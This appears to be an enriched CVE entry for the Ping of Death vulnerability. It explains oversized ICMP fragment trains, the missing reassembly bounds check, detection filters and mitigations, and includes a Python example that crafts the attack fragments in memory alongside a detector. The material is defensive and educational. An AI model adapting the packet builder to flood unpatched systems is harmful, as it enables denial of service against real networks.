Source: cve@mitre.org
Oversized ICMP ping packets can result in a denial of service, aka Ping o' Death.
Ping of Death (CVE-1999-0128) is a classic denial-of-service (DoS) vulnerability: the attacker sends an ICMP echo request whose reassembled size exceeds 65,535 bytes, the largest IPv4 datagram the 16-bit Total Length field can describe, and the target's IP stack overruns its reassembly buffer while putting the fragments back together, crashing or destabilizing the system. The flaw is in IP fragment reassembly rather than in ICMP itself; ICMP echo was simply the easiest vector, because common ping tools let the user choose an oversized payload and the sending stack fragmented it without complaint.
Step 1: Packet Crafting: The attacker requests an ICMP echo request whose total size (20-byte IP header plus 8-byte ICMP header plus payload) exceeds 65,535 bytes; the well-known case is a 65,510-byte ping payload, which gives a 65,538-byte datagram.
Step 2: Fragmentation: No single packet of that size can be put on the wire, so the attacker's IP stack (or a hand-crafted sender) emits it as a train of fragments, each within the link MTU and individually well-formed. The fragment offset field is 13 bits wide and counts 8-byte units, so it can place data as far out as byte 65,528; offset plus fragment length in the last fragment then reaches past 65,535.
Step 3: Packet Delivery: The fragments are sent to the target system; intermediate routers forward them like any other fragments.
Step 4: Reassembly: The target stack collects the fragments by identification field and copies each one's data into a reassembly buffer sized for the largest legal datagram, at the position given by its offset.
Step 5: Exploitation: The reassembly code never checks that offset plus length fits within that buffer, so the last fragment's data is written past the end of it, corrupting adjacent kernel memory.
Step 6: Denial of Service: The corrupted memory causes a kernel panic, hang, or reboot, and the target becomes unresponsive.
Root Cause: The vulnerability stems from a missing bounds check in IPv4 fragment reassembly. A datagram may be at most 65,535 bytes, and the reassembly buffer is allocated for that size, but each fragment carries its own offset (13 bits, in units of 8 bytes) and its own length, and nothing in the protocol prevents a fragment train from describing a datagram larger than the maximum: every fragment is individually valid, and only the sum offset + length of the final fragment reveals the problem. The vulnerable stacks trusted that sum implicitly and copied the fragment data to buffer + offset, so a final fragment placed near the 65,528-byte limit wrote its data past the end of the buffer and into whatever kernel memory followed, producing a crash or hang rather than a clean drop. The fix is the check the original code lacked: before copying any fragment, verify that the header length plus the fragment's offset plus its data length does not exceed 65,535 bytes, and discard the fragment (and the partial datagram) if it does.
This vulnerability is not associated with specific APT groups given its age and the widespread patching; mainstream operating systems have rejected such fragment trains for decades. It remains relevant only as a DoS technique against unpatched or legacy IP stacks that are still exposed. Not listed on CISA KEV.
Network Intrusion Detection Systems (NIDS) can be configured to detect oversized ICMP packets or malformed ICMP fragments.
Analyze network traffic for fragment trains in which a fragment's offset plus its data length exceeds the 65,535-byte IPv4 datagram limit. Checking per-packet size against the MTU is not enough, because each fragment of a Ping of Death is individually within the MTU; the oversize is only visible when offset and length are combined.
Monitor system logs for unusual activity or errors related to ICMP processing.
Use packet capture tools (e.g., tcpdump, Wireshark) to inspect ICMP traffic and identify potentially malicious packets; tcpdump can isolate non-first fragments with the filter ip[6:2] & 0x1fff != 0, and Wireshark's reassembly view shows the total length a fragment train would produce.
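The fragment train from the steps above, the missing reassembly check from the root cause, and the detection rule from the list above, as one added worked example in Python that is not part of the original entry or of any vendor's code. It builds the IPv4 fragments a permissive sender would emit for an oversized ICMP echo (the 65,510-byte payload, identification 0x4242 and the 10.0.0.x addresses are constructed sample values, and a 1,500-byte link MTU is assumed), models an unpatched reassembler by computing how far past a 65,535-byte buffer the last fragment would write rather than performing the write, and runs the hardened bound over the same packets as a wire-side detector.

```python
"""Ping of Death, end to end: build the oversized echo as IPv4 fragments,
model the unchecked reassembly, and detect the offending fragment.
All packets here are constructed in memory; nothing touches the network."""
import struct

IPV4_MAX_DATAGRAM = 65535   # the 16-bit IPv4 Total Length field tops out here
IPV4_HDR_LEN = 20
MF = 0x2000                 # "More Fragments" bit in the flags/offset field
OFFSET_MASK = 0x1FFF        # 13-bit fragment offset, counted in 8-byte units
LINK_MTU = 1500             # assumed link MTU; decides how the sender fragments


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (IP and ICMP use it)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_fragments(payload_len: int, ident: int = 0x4242,
                         mtu: int = LINK_MTU) -> list:
    """Emit the fragment train a permissive sender produces for an ICMP echo
    request carrying payload_len bytes. Nothing stops IP header + ICMP from
    exceeding 65,535 bytes: a 65,510-byte payload gives a 65,538-byte datagram.
    Each fragment on its own is legal and fits in the MTU.
    Addresses 10.0.0.1 -> 10.0.0.2 are constructed sample values."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, ident, 1) + b"A" * payload_len
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    per_frag = (mtu - IPV4_HDR_LEN) // 8 * 8        # 1480: keeps offsets 8-aligned
    src, dst = bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2])
    frags = []
    for off in range(0, len(icmp), per_frag):
        chunk = icmp[off:off + per_frag]
        units = off // 8
        if units > OFFSET_MASK:
            raise ValueError("offset does not fit in the 13-bit field")
        more = MF if off + per_frag < len(icmp) else 0
        hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, IPV4_HDR_LEN + len(chunk),
                          ident, more | units, 64, 1, 0, src, dst)
        hdr = hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]
        frags.append(hdr + chunk)
    return frags


def parse_fragment(pkt: bytes) -> dict:
    """Pull the reassembly-relevant fields out of one IPv4 packet."""
    ihl = (pkt[0] & 0x0F) * 4
    total_len, ident, flags_off = struct.unpack("!HHH", pkt[2:8])
    return {"ident": ident, "proto": pkt[9], "more": bool(flags_off & MF),
            "offset": (flags_off & OFFSET_MASK) * 8,   # byte offset of the data
            "data_len": total_len - ihl}


def reassembled_end(frag: dict) -> int:
    """Byte position where this fragment's data ends in the reassembled
    datagram, counting the IPv4 header that stays in front of the data."""
    return IPV4_HDR_LEN + frag["offset"] + frag["data_len"]


def vulnerable_overflow(frags: list) -> int:
    """Model of an unpatched reassembler: it allocates a 65,535-byte buffer and
    copies every fragment to header + offset without checking the end. Returns
    how many bytes the copy would write past the buffer (0 means it fits).
    The write is computed, not performed."""
    return max(0, max(reassembled_end(f) for f in frags) - IPV4_MAX_DATAGRAM)


def hardened_accept(frag: dict) -> bool:
    """The check the vulnerable code lacked: refuse, before copying, any
    fragment whose data would push the datagram past 65,535 bytes."""
    return reassembled_end(frag) <= IPV4_MAX_DATAGRAM


def detect_ping_of_death(packets: list) -> list:
    """Wire-side detection: the same bound applied to captured packets. Returns
    (ident, offset, end) for every ICMP fragment that breaks it. Per-packet size
    alone would miss this, since each fragment is within the MTU."""
    hits = []
    for pkt in packets:
        f = parse_fragment(pkt)
        if f["proto"] == 1 and not hardened_accept(f):
            hits.append((f["ident"], f["offset"], reassembled_end(f)))
    return hits


if __name__ == "__main__":
    benign = build_echo_fragments(56)        # ordinary 64-byte echo request
    attack = build_echo_fragments(65510)     # the classic oversized ping
    for name, train in (("benign", benign), ("attack", attack)):
        parsed = [parse_fragment(p) for p in train]
        print(name, len(train), "fragment(s), overflow by",
              vulnerable_overflow(parsed), "bytes, hits:",
              detect_ping_of_death(train))
```

The 65,510-byte case produces 45 fragments, all of 1,500 bytes or less; only the last one, at offset 65,120 with 398 bytes of data, ends at 65,538 and is reported, three bytes past the buffer. A detector that compared individual packet sizes with the MTU would see nothing unusual in that train, which is why the rule works on offset plus length rather than on size.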
Ensure that all systems are patched with the latest security updates from the vendor.
Implement network-based filtering to rate-limit ICMP echo traffic, especially from untrusted sources. Do not block ICMP wholesale: types such as "fragmentation needed" are required for path MTU discovery, and dropping them causes connectivity problems that are harder to diagnose than the attack.
Configure firewalls to drop fragments whose offset plus length exceeds 65,535 bytes, and consider dropping fragmented ICMP entirely at the perimeter, since legitimate echo requests rarely need fragmentation.
Regularly audit network configurations and security policies to ensure they are up-to-date.
Implement intrusion detection and prevention systems (IDS/IPS) to monitor and block malicious ICMP traffic.